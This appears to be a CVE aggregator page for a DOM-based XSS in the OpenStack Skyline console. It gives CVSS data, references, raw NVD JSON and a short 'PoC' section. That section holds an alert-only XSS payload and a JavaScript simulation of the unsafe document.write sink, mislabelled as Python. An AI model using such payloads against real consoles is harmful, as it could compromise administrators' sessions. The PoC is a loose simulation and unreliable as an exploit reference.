CVE-2026-40212

Description

OpenStack Skyline before 5.0.1, 6.0.0, and 7.0.0 has a DOM-based Cross-Site Scripting (XSS) vulnerability in the console because document.write is used unsafely, which is relevant in scenarios where administrators use the console web interface to view instance console logs.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

OpenStack Skyline < 5.0.1

OpenStack Skyline < 6.0.0

OpenStack Skyline < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-40212 (DOM-based XSS)
 * Context: Inject payload into VM console log output.
 * Trigger: Admin views the console in Skyline Dashboard.
 */

// Malicious payload to be injected into the VM console output
// (e.g., via setting a malicious hostname or shell output)
var payload = '<img src=x onerror=alert("CVE-2026-40212-XSS")>';

// Simulation of the vulnerable code in Skyline Console
// This mimics how the vulnerable frontend handles the log data
function vulnerableLogHandler(logData) {
    // Vulnerability: Using document.write with untrusted input
    document.write(logData);
}

// Triggering the vulnerability
vulnerableLogHandler(payload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40212
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40212
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40212/
[4] VulDB https://vuldb.com/cve/CVE-2026-40212
[5] https://bugs.launchpad.net/skyline-console/+bug/2138575
[6] https://review.opendev.org/973351
[7] https://security.openstack.org/ossa/OSSA-2026-006.html
[8] https://www.openwall.com/lists/oss-security/2026/04/09/30

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40212", "sourceIdentifier": "[email protected]", "published": "2026-04-10T08:16:25.850", "lastModified": "2026-04-13T15:02:06.187", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenStack Skyline before 5.0.1, 6.0.0, and 7.0.0 has a DOM-based Cross-Site Scripting (XSS) vulnerability in the console because document.write is used unsafely, which is relevant in scenarios where administrators use the console web interface to view instance console logs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://bugs.launchpad.net/skyline-console/+bug/2138575", "source": "[email protected]"}, {"url": "https://review.opendev.org/973351", "source": "[email protected]"}, {"url": "https://security.openstack.org/ossa/OSSA-2026-006.html", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/04/09/30", "source": "[email protected]"}]}}